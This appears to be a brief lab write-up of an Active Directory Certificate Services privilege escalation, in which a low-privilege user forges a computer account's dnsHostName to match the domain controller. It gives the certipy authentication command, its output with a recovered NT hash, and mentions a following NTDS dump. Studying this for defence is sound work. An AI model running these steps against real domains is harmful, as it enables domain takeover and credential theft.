Oliver Lyak found out a way to escalate privilege as a low privilege user into an active directory. This consist of change the dnsHostName property on a created computer. The idea look the same as samAccountName vulnerability, it is a confusion with name on authentication. Details are here :
An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege to System.
Create an account with a domain user and set a fake dns name as the domain controler.
Authenticate with the certificate as bailtimore (the dc)
sudo certipy auth -pfx baltimore.pfx -username 'baltimore$' -domain maryland.local -dc-ip 192.168.56.12
Certipy v4.3.0 - by Oliver Lyak (ly4k)
[*] Using principal: baltimore$@maryland.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'baltimore.ccache'
[*] Trying to retrieve NT hash for 'baltimore$'
[*] Got hash for 'baltimore$@maryland.local': aad3b435b51404eeaad3b435b51404ee:d06fbfbf20638881486242cfa9827759
Add variable to working environment
Dump the ndts with the kerberos ticket we just get